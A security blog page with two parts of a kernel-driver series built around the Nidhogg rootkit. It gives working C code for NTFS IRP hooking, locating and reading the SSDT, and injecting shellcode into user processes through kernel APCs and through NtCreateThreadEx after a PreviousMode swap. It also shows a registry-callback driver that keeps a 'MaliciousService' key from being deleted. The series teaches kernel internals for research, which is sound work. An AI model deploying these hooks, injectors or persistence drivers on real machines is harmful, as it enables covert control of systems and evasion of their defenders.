Normal view

There are new articles available, click to refresh the page.
Before yesterdayIdo Veltzman - Security Blog

Lord Of The Ring0 - Part 5 | Saruman’s Manipulation

19 July 2023 at 00:00

star fork follow

Prologue

In the last blog post, we learned about the different types of kernel callbacks and created our registry protector driver.

In this blog post, I’ll explain two common hooking methods (IRP Hooking and SSDT Hooking) and two different injection techniques from the kernel to the user mode for both shellcode and DLL (APC and CreateThread) with code snippets and examples from Nidhogg.

IRP Hooking

Side note: This topic (and more) was also covered in my talk “(Lady)Lord Of The Ring0” - feel free to check that out!

IRP Reminder

This is a quick reminder from the 2nd part, if you remember what IRP is you can skip to the next section.

“An I/O request packet (IRP) is the basic I/O manager structure used to communicate with drivers and to allow drivers to communicate with each other. A packet consists of two different parts:

  • Header, or fixed part of the packet — This is used by the I/O manager to store information about the original request.
  • I/O stack locations — Stack location contains the parameters, function codes, and context used by the corresponding driver to determine what it is supposed to be doing.” - Microsoft Docs.

In simple words, IRP allows kernel developers to communicate either from user mode to kernel mode or from one kernel driver to another. Each time a certain IRP is sent, the corresponding function in the dispatch table is executed. The dispatch table (or MajorFunction) is a member inside the DRIVER_OBJECT that contains the mapping between the IRP and the function that should handle the IRP. The general signature for a function that handles IRP is:

NTSTATUS IrpHandler(PDEVICE_OBJECT DeviceObject, PIRP Irp);

To handle an IRP, the developer needs to add their function to the MajorFunction table as follows:

DriverObject->MajorFunction[IRP_CODE] = IrpHandler;

Several notable IRPs (some of them we used previously in this series) are:

  • IRP_MJ_DEVICE_CONTROL - Used to handle communication with the driver.

  • IRP_MJ_CREATE - Used to handle Zw/NtOpenFile calls to the driver.

  • IRP_MJ_CLOSE - Used to handle (among other things) Zw/NtClose calls to the driver.

  • IRP_MJ_READ - Used to handle Zw/NtReadFile calls to the driver.

  • IRP_MJ_WRITE - Used to handle Zw/NtWriteFile calls to the driver.

Implementing IRP Hooking

IRP hooking is very similar to IAT hooking in a way, as both of them are about replacing a function in a table and deciding whether to call the original function or not (usually, the original function will be called).

In IRP hooking the malicious driver replaces an IRP handler of another driver with their handler. A common example is to hook the IRP_MJ_CREATE handler of the NTFS driver to prevent file opening.

As an example, I will show the NTFS IRP_MJ_CREATE hook from Nidhogg:

NTSTATUS InstallNtfsHook(int irpMjFunction) {
    UNICODE_STRING ntfsName;
    PDRIVER_OBJECT ntfsDriverObject;
    NTSTATUS status = STATUS_SUCCESS;

    RtlInitUnicodeString(&ntfsName, L"\\FileSystem\\NTFS");
    status = ObReferenceObjectByName(&ntfsName, OBJ_CASE_INSENSITIVE, NULL, 0, *IoDriverObjectType, KernelMode, NULL, (PVOID*)&ntfsDriverObject);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "Failed to get ntfs driver object, (0x%08X).\n", status));
        return status;
    }

    switch (irpMjFunction) {
        case IRP_MJ_CREATE: {
            // Saving the original IRP handler into a callback array.
            Callbacks[0].Address = (PVOID)InterlockedExchange64((LONG64*)&ntfsDriverObject->MajorFunction[IRP_MJ_CREATE], (LONG64)HookedNtfsIrpCreate);
            Callbacks[0].Activated = true;
            KdPrint((DRIVER_PREFIX "Switched addresses\n"));
            break;
        }
        default:
            status = STATUS_NOT_SUPPORTED;
    }

    ObDereferenceObject(ntfsDriverObject);
    return status;
}

The first thing that is needed to be done when doing an IRP hooking is to obtain the DriverObject because it stores the MajorFunction table (as mentioned before), this can be done with the ObReferenceObjectByName and the symbolic link to NTFS.

When the DriverObject is achieved, it is just a matter of overwriting the original value of IRP_MJ_CREATE with InterlockedExchange64 (NOTE: InterlockedExchange64 was used and not simply overwriting to make sure the function is not currently in used to prevent potential BSOD and other problems).

Hooking IRPs in 2023

Although this is a nice method, there is one major problem that holding kernel developers from using this method - Kernel Patch Protection (PatchGuard). As you can see here when PatchGuard detects that the IRP function is changed, it triggers a BSOD with CRITICAL_STRUCTURE_CORRUPTION error code.

While bypassing this is possible with projects like this one it is beyond the scope of this series.

SSDT Hooking

What is SSDT

SSDT (System Service Descriptor Table) is an array that contains the mapping between the syscall and the corresponding function in the kernel. The SSDT is accessible via nt!KiServiceTable in WinDBG or can be located dynamically via pattern searching.

The syscall number is the index to the relative offset of the function and is calculated as follows: functionAddress = KiServiceTable + (KiServiceTable[syscallIndex] >> 4).

Implementing SSDT Hooking

SSDT hooking is when a malicious program changes the mapping of a certain syscall to point to its function. For example, an attacker can modify the NtCreateFile address in the SSDT to point to their own malicious NtCreateFile. To do that, several steps need to be made:

  • Find the address of SSDT.
  • Find the address of the wanted function in the SSDT by its syscall.
  • Change the entry in the SSDT to point to the malicious function.

To find the address of SSDT by pattern I will use the code below (the code has been modified a bit for readability, you can view the unmodified version here):

NTSTATUS GetSSDTAddress() {
    ULONG infoSize;
    PVOID ssdtRelativeLocation = NULL;
    PVOID ntoskrnlBase = NULL;
    PRTL_PROCESS_MODULES info = NULL;
    NTSTATUS status = STATUS_SUCCESS;
    UCHAR pattern[] = "\x4c\x8d\x15\xcc\xcc\xcc\xcc\x4c\x8d\x1d\xcc\xcc\xcc\xcc\xf7";

    // Getting ntoskrnl base.
    status = ZwQuerySystemInformation(SystemModuleInformation, NULL, 0, &infoSize);

    // ...

    PRTL_PROCESS_MODULE_INFORMATION modules = info->Modules;

    for (ULONG i = 0; i < info->NumberOfModules; i++) {
        if (NtCreateFile >= modules[i].ImageBase && NtCreateFile < (PVOID)((PUCHAR)modules[i].ImageBase + modules[i].ImageSize)) {
            ntoskrnlBase = modules[i].ImageBase;
            break;
        }
    }

    // ...

    PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)ntoskrnlBase;

    // Finding the SSDT address.
    status = STATUS_NOT_FOUND;
    if (dosHeader->e_magic != IMAGE_DOS_SIGNATURE)
        goto CleanUp;

    PFULL_IMAGE_NT_HEADERS ntHeaders = (PFULL_IMAGE_NT_HEADERS)((PUCHAR)ntoskrnlBase + dosHeader->e_lfanew);

    if (ntHeaders->Signature != IMAGE_NT_SIGNATURE)
        goto CleanUp;

    PIMAGE_SECTION_HEADER firstSection = (PIMAGE_SECTION_HEADER)(ntHeaders + 1);

    for (PIMAGE_SECTION_HEADER section = firstSection; section < firstSection + ntHeaders->FileHeader.NumberOfSections; section++) {
        if (strcmp((const char*)section->Name, ".text") == 0) {
            ssdtRelativeLocation = FindPattern(pattern, 0xCC, sizeof(pattern) - 1, (PUCHAR)ntoskrnlBase + section->VirtualAddress, section->Misc.VirtualSize, NULL, NULL);

            if (ssdtRelativeLocation) {
                status = STATUS_SUCCESS;
                ssdt = (PSYSTEM_SERVICE_DESCRIPTOR_TABLE)((PUCHAR)ssdtRelativeLocation + *(PULONG)((PUCHAR)ssdtRelativeLocation + 3) + 7);
                break;
            }
        }
    }

CleanUp:
    if (info)
        ExFreePoolWithTag(info, DRIVER_TAG);
    return status;
}

The code above is finding ntoskrnl base based on the location of NtCreateFile. After the base of ntoskrnl was achieved all is left to do is to find the pattern within the .text section of it. The pattern gives the relative location of the SSDT and with a simple calculation based on the relative offset the location of the SSDT is achieved.

To find a function, all there needs to be done is to find the syscall of the desired function (alternatively a hardcoded syscall can be used as well but it is bad practice for forward compatibility) and then access the right location in the SSDT (as mentioned here).

PVOID GetSSDTFunctionAddress(CHAR* functionName) {
    KAPC_STATE state;
    PEPROCESS CsrssProcess = NULL;
    PVOID functionAddress = NULL;
    PSYSTEM_PROCESS_INFO originalInfo = NULL;
    PSYSTEM_PROCESS_INFO info = NULL;
    ULONG infoSize = 0;
    ULONG index = 0;
    UCHAR syscall = 0;
    HANDLE csrssPid = 0;
    NTSTATUS status = ZwQuerySystemInformation(SystemProcessInformation, NULL, 0, &infoSize);

    // ...

    // Iterating the processes information until our pid is found.
    while (info->NextEntryOffset) {
        if (info->ImageName.Buffer && info->ImageName.Length > 0) {
            if (_wcsicmp(info->ImageName.Buffer, L"csrss.exe") == 0) {
                csrssPid = info->UniqueProcessId;
                break;
            }
        }
        info = (PSYSTEM_PROCESS_INFO)((PUCHAR)info + info->NextEntryOffset);
    }

    if (csrssPid == 0)
        goto CleanUp;
    status = PsLookupProcessByProcessId(csrssPid, &CsrssProcess);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    // Attaching to the process's stack to be able to walk the PEB.
    KeStackAttachProcess(CsrssProcess, &state);
    PVOID ntdllBase = GetModuleBase(CsrssProcess, L"C:\\Windows\\System32\\ntdll.dll");

    if (!ntdllBase) {
        KeUnstackDetachProcess(&state);
        goto CleanUp;
    }
    PVOID ntdllFunctionAddress = GetFunctionAddress(ntdllBase, functionName);

    if (!ntdllFunctionAddress) {
        KeUnstackDetachProcess(&state);
        goto CleanUp;
    }

    // Searching for the syscall.
    while (((PUCHAR)ntdllFunctionAddress)[index] != RETURN_OPCODE) {
        if (((PUCHAR)ntdllFunctionAddress)[index] == MOV_EAX_OPCODE) {
            syscall = ((PUCHAR)ntdllFunctionAddress)[index + 1];
        }
        index++;
    }
    KeUnstackDetachProcess(&state);

    if (syscall != 0)
        functionAddress = (PUCHAR)ssdt->ServiceTableBase + (((PLONG)ssdt->ServiceTableBase)[syscall] >> 4);

CleanUp:
    if (CsrssProcess)
        ObDereferenceObject(CsrssProcess);

    if (originalInfo) {
        ExFreePoolWithTag(originalInfo, DRIVER_TAG);
        originalInfo = NULL;
    }

    return functionAddress;
}

The code above is finding csrss (a process that will always run and has ntdll) loaded and finding the location of the function inside ntdll. After it finds the location of the function inside ntdll, it searches for the last mov eax, [variable] pattern to make sure it finds the syscall number. When the syscall number is known, all there is needs to be done is to find the function address with the SSDT.

Hooking The SSDT in 2023

This method was abused heavily by rootkit developers and Antimalware developers alike in the golden area of rootkits. The reason this method is no longer used is because PatchGuard monitors SSDT changes and crashes the machine if a modification is detected.

While this method cannot be used in modern systems without tampering with PatchGuard, throughout the years developers found other ways to hook syscalls as substitution.

APC Injection

Explaining how APCs work is beyond the scope of this series, which is why I recommend reading Repnz’s series about APCs.

To inject a shellcode into a user mode process with an APC several conditions need to be met:

  • The thread should be alertable.
  • The shellcode should be accessible from the user mode.
NTSTATUS InjectShellcodeAPC(ShellcodeInformation* ShellcodeInfo) {
    OBJECT_ATTRIBUTES objAttr{};
    CLIENT_ID cid{};
    HANDLE hProcess = NULL;
    PEPROCESS TargetProcess = NULL;
    PETHREAD TargetThread = NULL;
    PKAPC ShellcodeApc = NULL;
    PKAPC PrepareApc = NULL;
    PVOID shellcodeAddress = NULL;
    NTSTATUS status = STATUS_SUCCESS;
    SIZE_T shellcodeSize = ShellcodeInfo->ShellcodeSize;

    HANDLE pid = UlongToHandle(ShellcodeInfo->Pid);
    status = PsLookupProcessByProcessId(pid, &TargetProcess);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    // Find APC suitable thread.
    status = FindAlertableThread(pid, &TargetThread);

    if (!NT_SUCCESS(status) || !TargetThread) {
        if (NT_SUCCESS(status))
            status = STATUS_NOT_FOUND;
        goto CleanUp;
    }

    // Allocate and write the shellcode.
    InitializeObjectAttributes(&objAttr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
    cid.UniqueProcess = pid;
    cid.UniqueThread = NULL;

    status = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &cid);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    status = ZwAllocateVirtualMemory(hProcess, &shellcodeAddress, 0, &shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READ);

    if (!NT_SUCCESS(status))
        goto CleanUp;
    shellcodeSize = ShellcodeInfo->ShellcodeSize;

    status = KeWriteProcessMemory(ShellcodeInfo->Shellcode, TargetProcess, shellcodeAddress, shellcodeSize, UserMode);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    // Create and execute the APCs.
    ShellcodeApc = (PKAPC)ExAllocatePoolWithTag(NonPagedPool, sizeof(KAPC), DRIVER_TAG);
    PrepareApc = (PKAPC)ExAllocatePoolWithTag(NonPagedPool, sizeof(KAPC), DRIVER_TAG);

    if (!ShellcodeApc || !PrepareApc) {
        status = STATUS_UNSUCCESSFUL;
        goto CleanUp;
    }

    // VOID PrepareApcCallback(PKAPC Apc, PKNORMAL_ROUTINE* NormalRoutine, PVOID* NormalContext, PVOID* SystemArgument1, PVOID* SystemArgument2) {
    // UNREFERENCED_PARAMETER(NormalRoutine);
    // UNREFERENCED_PARAMETER(NormalContext);
    // UNREFERENCED_PARAMETER(SystemArgument1);
    // UNREFERENCED_PARAMETER(SystemArgument2);

    // KeTestAlertThread(UserMode);
    // ExFreePoolWithTag(Apc, DRIVER_TAG);
    // }
    KeInitializeApc(PrepareApc, TargetThread, OriginalApcEnvironment, (PKKERNEL_ROUTINE)PrepareApcCallback, NULL, NULL, KernelMode, NULL);

    // VOID ApcInjectionCallback(PKAPC Apc, PKNORMAL_ROUTINE* NormalRoutine, PVOID* NormalContext, PVOID* SystemArgument1, PVOID* SystemArgument2) {
    // UNREFERENCED_PARAMETER(SystemArgument1);
    // UNREFERENCED_PARAMETER(SystemArgument2);
    // UNREFERENCED_PARAMETER(NormalContext);

    // if (PsIsThreadTerminating(PsGetCurrentThread()))
    //     *NormalRoutine = NULL;

    // ExFreePoolWithTag(Apc, DRIVER_TAG);
    // }
    KeInitializeApc(ShellcodeApc, TargetThread, OriginalApcEnvironment, (PKKERNEL_ROUTINE)ApcInjectionCallback, NULL, (PKNORMAL_ROUTINE)shellcodeAddress, UserMode, ShellcodeInfo->Parameter1);

    if (!KeInsertQueueApc(ShellcodeApc, ShellcodeInfo->Parameter2, ShellcodeInfo->Parameter3, FALSE)) {
        status = STATUS_UNSUCCESSFUL;
        goto CleanUp;
    }

    if (!KeInsertQueueApc(PrepareApc, NULL, NULL, FALSE)) {
        status = STATUS_UNSUCCESSFUL;
        goto CleanUp;
    }

    if (PsIsThreadTerminating(TargetThread))
        status = STATUS_THREAD_IS_TERMINATING;

CleanUp:
    if (!NT_SUCCESS(status)) {
        if (shellcodeAddress)
            ZwFreeVirtualMemory(hProcess, &shellcodeAddress, &shellcodeSize, MEM_DECOMMIT);
        if (PrepareApc)
            ExFreePoolWithTag(PrepareApc, DRIVER_TAG);
        if (ShellcodeApc)
            ExFreePoolWithTag(ShellcodeApc, DRIVER_TAG);
    }

    if (TargetProcess)
        ObDereferenceObject(TargetProcess);

    if (hProcess)
        ZwClose(hProcess);

    return status;
}

The code above opens a target process, search for a thread that can be alerted (can be done by examining the thread’s MiscFlags Alertable bit and the thread’s ThreadFlags’s GUI bit, if a thread is alertable and isn’t GUI related it is suitable).

If the thread is suitable, two APCs are initialized, one for alerting the thread and another one to clean up the memory and execute the shellcode.

After the APCs are initialized, they are queued - first, the APC that will clean up the memory and execute the shellcode and later the APC that is alerting the thread to execute the shellcode.

CreateThread Injection

Injecting a thread into a user mode process from the kernel is similar to injecting from a user mode with the main difference being that there are sufficient privileges to create another thread inside that process. That can be achieved easily by changing the calling thread’s previous mode to KernelMode and restoring it once the thread has been created.

NTSTATUS InjectShellcodeThread(ShellcodeInformation* ShellcodeInfo) {
    OBJECT_ATTRIBUTES objAttr{};
    CLIENT_ID cid{};
    HANDLE hProcess = NULL;
    HANDLE hTargetThread = NULL;
    PEPROCESS TargetProcess = NULL;
    PVOID remoteAddress = NULL;
    SIZE_T shellcodeSize = ShellcodeInfo->ShellcodeSize;
    HANDLE pid = UlongToHandle(ShellcodeInfo->Pid);
    NTSTATUS status = PsLookupProcessByProcessId(pid, &TargetProcess);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    InitializeObjectAttributes(&objAttr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
    cid.UniqueProcess = pid;
    cid.UniqueThread = NULL;

    status = ZwOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &objAttr, &cid);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    status = ZwAllocateVirtualMemory(hProcess, &remoteAddress, 0, &shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READ);

    if (!NT_SUCCESS(status))
        goto CleanUp;
    shellcodeSize = ShellcodeInfo->ShellcodeSize;

    status = KeWriteProcessMemory(ShellcodeInfo->Shellcode, TargetProcess, remoteAddress, shellcodeSize, UserMode);

    if (!NT_SUCCESS(status))
        goto CleanUp;

    // Making sure that for the creation the thread has access to kernel addresses and restoring the permissions right after.
    InitializeObjectAttributes(&objAttr, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
    PCHAR previousMode = (PCHAR)((PUCHAR)PsGetCurrentThread() + THREAD_PREVIOUSMODE_OFFSET);
    CHAR tmpPreviousMode = *previousMode;
    *previousMode = KernelMode;
    status = NtCreateThreadEx(&hTargetThread, THREAD_ALL_ACCESS, &objAttr, hProcess, (PTHREAD_START_ROUTINE)remoteAddress, NULL, 0, NULL, NULL, NULL, NULL);
    *previousMode = tmpPreviousMode;

CleanUp:
    if (hTargetThread)
        ZwClose(hTargetThread);

    if (!NT_SUCCESS(status) && remoteAddress)
        ZwFreeVirtualMemory(hProcess, &remoteAddress, &shellcodeSize, MEM_DECOMMIT);

    if (hProcess)
        ZwClose(hProcess);

    if (TargetProcess)
        ObDereferenceObject(TargetProcess);

    return status;
}

Unlike the APC injection, the steps here are simple: After the process has been opened and the shellcode was allocated and written to the target process, changing the current thread’s mode to KernelMode and calling NtCreateThreadEx to create a thread inside the target process and restoring it to the original previous mode right after.

Conclusion

In this blog, we learned about the different types of kernel callbacks and created our registry protector driver.

In the next blog, we will learn how to patch user mode memory from the kernel and write a simple driver that can perform AMSI bypass to demonstrate, how to hide ports and how to dump credentials from the kernel.

I hope that you enjoyed the blog and I’m available on Twitter, Telegram and by Mail to hear what you think about it! This blog series is following my learning curve of kernel mode development and if you like this blog post you can check out Nidhogg on GitHub.

Lord Of The Ring0 - Part 4 | The call back home

24 February 2023 at 00:00

star fork follow

Prologue

In the last blog post, we learned some debugging concepts, understood what is IOCTL how to handle it and started to learn how to validate the data that we get from the user mode - data that cannot be trusted and a handling mistake can cause a blue screen of death.

In this blog post, I’ll explain the different types of callbacks and we will write another driver to protect registry keys.

Kernel Callbacks

We started to talk about this subject in the 2nd part, so if you haven’t read it yet read it here and come back as this blog is based on the knowledge you have learned in the previous ones.

For starters, let’s see what type of callbacks we’re going to learn about today:

  • Pre / Post operations (can be registered with ObRegisterCallbacks and talked about it in the 2nd part).
  • PsSet*NotifyRoutine.
  • CmRegisterCallbackEx.

Each of the mentioned callbacks has its purpose and difference and the most important thing to know is to get the right tool for the job, so for each type, I will also give an example of how it can be used in different scenarios.

ObRegisterCallbacks

ObRegisterCallbacks is a function that allows you to register a callback of your choice for certain events (process, thread, and much more) before or after they’re happening. To register a callback you need to give the following structure:

typedef struct _OB_CALLBACK_REGISTRATION {
  USHORT                    Version;
  USHORT                    OperationRegistrationCount;
  UNICODE_STRING            Altitude;
  PVOID                     RegistrationContext;
  OB_OPERATION_REGISTRATION *OperationRegistration;
} OB_CALLBACK_REGISTRATION, *POB_CALLBACK_REGISTRATION;

Version MUST be OB_FLT_REGISTRATION_VERSION.

OperationRegistrationCount is the number of registered callbacks.

Altitude is a unique identifier in form of a string with this pattern #define OB_CALLBACKS_ALTITUDE L"XXXXX.XXXX" where X is a number. It is mandatory to define one so the OS will be able to identify your driver and determine the load order if you don’t define it or if the Altitude isn’t unique the registration will fail.

RegistrationContext is the handle that will be used later on to Unregister the callbacks.

Finally, OperationRegistration is an array that contains all of your registered callbacks. OperationRegistration and every callback have this structure:

typedef struct _OB_OPERATION_REGISTRATION {
  POBJECT_TYPE                *ObjectType;
  OB_OPERATION                Operations;
  POB_PRE_OPERATION_CALLBACK  PreOperation;
  POB_POST_OPERATION_CALLBACK PostOperation;
} OB_OPERATION_REGISTRATION, *POB_OPERATION_REGISTRATION;

ObjectType is the type of operation that you want to register to. Some of the most common types are *PsProcessType and *PsThreadType. It is worth mentioning that although you can enable more types (like IoFileObjectType) this will trigger PatchGuard and cause your computer to BSOD, so unless PatchGuard is disabled it is highly not recommended to enable more types. If you still want to enable more types, you can do so by using this like so:

typedef struct _OBJECT_TYPE
{
 struct _LIST_ENTRY TypeList;     
 struct _UNICODE_STRING Name;     
 VOID* DefaultObject;             
 UCHAR Index;                   
 ULONG TotalNumberOfObjects;     
 ULONG TotalNumberOfHandles;    
 ULONG HighWaterNumberOfObjects;  
 ULONG HighWaterNumberOfHandles;
 struct _OBJECT_TYPE_INITIALIZER_TEMP TypeInfo;
 struct _EX_PUSH_LOCK_TEMP TypeLock;
 ULONG Key;
 struct _LIST_ENTRY CallbackList;
} OBJECT_TYPE, * POBJECT_TYPE;

POBJECT_TYPE_TEMP ObjectTypeTemp = (POBJECT_TYPE_TEMP)*IoFileObjectType;
ObjectTypeTemp->TypeInfo.SupportsObjectCallbacks = 1;

Operations are the kind of operations that you are interested in, it can be OB_OPERATION_HANDLE_CREATE and/or OB_OPERATION_HANDLE_DUPLICATE for a handle creation or duplication.

PreOperation is an operation that will be called before the handle is opened and PostOperation will be called after it is opened. In both cases, you are getting important information through OB_PRE_OPERATION_INFORMATION or OB_POST_OPERATION_INFORMATION such as a handle to the object, the type of the object the return status, and what type of operation (OB_OPERATION_HANDLE_CREATE or OB_OPERATION_HANDLE_DUPLICATE) occurred. Both of them must ALWAYS return OB_PREOP_SUCCESS, if you want to change the return status, you can change the ReturnStatus that you got from the operation information, but do not return anything else.

After you registered this kind of callback, you can remove certain permissions from the handle (for example: If you don’t want to allow a process to be closed, you can just remove the PROCESS_TERMINATE permission as we did in part 2 of the series) or manipulate the object itself (if it is a process, you can change the EPROCESS structure).

As you can see, these kinds of operations are very useful for both rootkits and AVs/EDRs to protect their user mode component. Usually, if you have a user mode part you will want to use some of these callbacks to make sure your process/thread is protected properly and cannot be killed easily.

PsSet*NotifyRoutine

Unlike ObRegisterCallbacks PsSet notifies routines are not responsible for a handle opening or duplicating operation but for monitoring creation/killing and loading operations, while the most notorious ones are PsSetCreateProcessNotifyRoutine, PsSetCreateThreadNotifyRoutine and PsSetLoadImageNotifyRoutine all of them are heavily used by AVs/EDRs to monitor for certain process/thread creations and DLL loading. Let’s break it down, and talk about each function separately and what you can do with it.

PsSetCreateProcessNotifyRoutine receives a function of type PCREATE_PROCESS_NOTIFY_ROUTINE which looks like so:

void PcreateProcessNotifyRoutine(
  [in] HANDLE ParentId,
  [in] HANDLE ProcessId,
  [in] BOOLEAN Create
)

ParentId is the PID of the process that attempts to create or kill the target process. ProcessId is the PID of the target process. Create indicates whether it is a create or kill operation.

The most common example of using this kind of routine is to watch certain processes and if there is an attempt to create a forbidden process (e.g. create a cmd directly under Winlogon), you can kill it. Another example can be of creating a “watchdog” for a certain process and if it is killed by an unauthorized process, restart it.

PsSetCreateThreadNotifyRoutine receives a function of type PCREATE_THREAD_NOTIFY_ROUTINE which looks like so:

void PcreateThreadNotifyRoutine(
  [in] HANDLE ProcessId,
  [in] HANDLE ThreadId,
  [in] BOOLEAN Create
)

ProcessId is the PID of the process. ThreadId is the TID of the target thread. Create indicates whether it is a create or kill operation.

A simple example of using this kind of routine is if an EDR injected its library into a process, make sure that the library’s thread is getting killed.

PsSetLoadImageNotifyRoutine receives a function of type PLOAD_IMAGE_NOTIFY_ROUTINE which looks like so:

void PloadImageNotifyRoutine(
  [in, optional] PUNICODE_STRING FullImageName,
  [in]           HANDLE ProcessId,
  [in]           PIMAGE_INFO ImageInfo
)

FullImageName is the name of the loaded image (a note here: it is not only DLLs and can be also EXE for example). ProcessId is the PID of the target process. ImageInfo is the most interesting part and contains a struct of type IMAGE_INFO:

typedef struct _IMAGE_INFO {
  union {
    ULONG Properties;
    struct {
      ULONG ImageAddressingMode : 8;
      ULONG SystemModeImage : 1;
      ULONG ImageMappedToAllPids : 1;
      ULONG ExtendedInfoPresent : 1;
      ULONG MachineTypeMismatch : 1;
      ULONG ImageSignatureLevel : 4;
      ULONG ImageSignatureType : 3;
      ULONG ImagePartialMap : 1;
      ULONG Reserved : 12;
    };
  };
  PVOID  ImageBase;
  ULONG  ImageSelector;
  SIZE_T ImageSize;
  ULONG  ImageSectionNumber;
} IMAGE_INFO, *PIMAGE_INFO;

The most important properties in my opinion are ImageBase and ImageSize, using these you can inspect and analyze the image pretty efficiently. A simple example is if an attacker injects a DLL into LSASS, an EDR can inspect the image and unload it if it finds it malicious. If the ExtendedInfoPresent option is available, it means that this struct is of type IMAGE_INFO_EX:

typedef struct _IMAGE_INFO_EX {
  SIZE_T              Size;
  IMAGE_INFO          ImageInfo;
  struct _FILE_OBJECT *FileObject;
} IMAGE_INFO_EX, *PIMAGE_INFO_EX;

As you can see, here you also get the FILE_OBJECT which is a handle for the file that is backed on the disk. With that information, you can also check for reflective DLL injection (a loaded DLL without any file backed on the disk) and it opens a door for you to monitor for more injection methods that don’t have a file on the disk.

These kinds of functions are usually used more for EDRs and AVs rather than rootkits, because as you can see it provides insights that are more useful for monitoring rather than doing malicious operations but that doesn’t mean it doesn’t have a use at all. For example, a rootkit can use the PsSetLoadImageNotifyRoutine to make sure that no AV/EDR agent is injected into it.

CmRegisterCallbackEx

CmRegisterCallbackEx is responsible to register a registry callback that can monitor and interfere with various registry operations such as registry key creation, deletion, querying and more. Like the ObRegisterCallbacks functions, it receives a unique altitude and the callback function. Let’s focus on the Registry callback function:

NTSTATUS ExCallbackFunction(
  [in]           PVOID CallbackContext,
  [in, optional] PVOID Argument1,
  [in, optional] PVOID Argument2
)

CallbackContext is the context that was passed on the function registration with CmRegisterCallbackEx. Argument1 is a variable that contains the information of what operation was made (e.g. deletion, creation, setting value) and whether it is a post-operation or pre-operation. Argument2 is the information itself that is delivered and its type matches the class that was specified in Argument1.

Using this callback, a rootkit can do many operations, from blocking a change to a specific registry key, denying setting a specific value or hiding registry keys and values.

An example is a rootkit that saves its configuration in the registry and then hides it using this callback. To give another practical example, we will create now another driver - a driver that can protect registry keys from deletion.

Registry Protector

First, let’s start with the DriverEntry:

#define DRIVER_PREFIX "MyDriver: "
#define DRIVER_DEVICE_NAME L"\\Device\\MyDriver"
#define DRIVER_SYMBOLIC_LINK L"\\??\\MyDriver"
#define REG_CALLBACK_ALTITUDE L"31102.0003"

PVOID g_RegCookie;

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
    UNREFERENCED_PARAMETER(RegistryPath);
    NTSTATUS status = STATUS_SUCCESS;

    UNICODE_STRING deviceName = RTL_CONSTANT_STRING(DRIVER_DEVICE_NAME);
    UNICODE_STRING symbolicLink = RTL_CONSTANT_STRING(DRIVER_SYMBOLIC_LINK);
    UNICODE_STRING regAltitude = RTL_CONSTANT_STRING(REG_CALLBACK_ALTITUDE);

    // Creating device and symbolic link.
    status = IoCreateDevice(DriverObject, 0, &deviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, &DeviceObject);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "Failed to create device: (0x%08X)\n", status));
        return status;
    }
    
    status = IoCreateSymbolicLink(&symbolicLink, &deviceName);
    
    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "Failed to create symbolic link: (0x%08X)\n", status));
        IoDeleteDevice(DeviceObject);
        return status;
    }

    // Registering the registry callback.
    status = CmRegisterCallbackEx(RegNotify, &regAltitude, DriverObject, nullptr, &g_RegContext, nullptr);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "Failed to register registry callback: (0x%08X)\n", status));
        IoDeleteSymbolicLink(&symbolicLink);
        IoDeleteDevice(DeviceObject);
        return status;
    }

    DriverObject->DriverUnload = MyUnload;
    return status;
}

We added to the standard DriverEntry initializations (Creating DeviceObject and symbolic link) CmRegisterCallbackEx to register our RegNotify callback. Note that we saved the g_RegContext as a global variable, as it will be used soon in the MyUnload function to unregister the driver when the DriverUnload is called.

void MyUnload(PDRIVER_OBJECT DriverObject) {
    KdPrint((DRIVER_PREFIX "Unloading...\n"));
    NTSTATUS status = CmUnRegisterCallback(g_RegContext);

    if (!NT_SUCCESS(status)) {
        KdPrint((DRIVER_PREFIX "Failed to unregister registry callbacks: (0x%08X)\n", status));
    }

    UNICODE_STRING symbolicLink = RTL_CONSTANT_STRING(DRIVER_SYMBOLIC_LINK);
    IoDeleteSymbolicLink(&symbolicLink);
    IoDeleteDevice(DriverObject->DeviceObject);
}

In MyUnload, we didn’t just unload the driver but also made sure to unregister our callback using the g_RegContext from before.

NTSTATUS RegNotify(PVOID context, PVOID Argument1, PVOID Argument2) {
    PCUNICODE_STRING regPath;
    UNREFERENCED_PARAMETER(context);
    NTSTATUS status = STATUS_SUCCESS;
    
    switch ((REG_NOTIFY_CLASS)(ULONG_PTR)Argument1) {
        case RegNtPreDeleteKey: {
            REG_DELETE_KEY_INFORMATION* info = static_cast<REG_DELETE_KEY_INFORMATION*>(Argument2);
            
            // To avoid BSOD.
            if (!info->Object)
                break;
            
            status = CmCallbackGetKeyObjectIDEx(&g_RegContext, info->Object, nullptr, &regPath, 0);
            
            if (!NT_SUCCESS(status))
                break;
            
            if (!regPath->Buffer || regPath->Length < 50)
                break;

            if (_wcsnicmp(LR"(SYSTEM\CurrentControlSet\Services\MaliciousService)", regPath->Buffer, 50) == 0) {
                KdPrint((DRIVER_PREFIX "Protected the malicious service!\n"));
                status = STATUS_ACCESS_DENIED;
            }
            
            CmCallbackReleaseKeyObjectIDEx(regPath);
        }
        break;
    }
    
    return status;
}

Let’s break down what we’ve done here. First, we checked what is the type of operation and chose to respond only for RegNtPreDeleteKey. When we know that Argument2 contains information of type REG_DELETE_KEY_INFORMATION we can cast to it.

After the cast, we can use the Object parameter to access the registry key itself to get the key’s path. To do that, we can use CmCallbackGetKeyObjectIDEx:

NTSTATUS CmCallbackGetKeyObjectIDEx(
  [in]            PLARGE_INTEGER   Cookie,
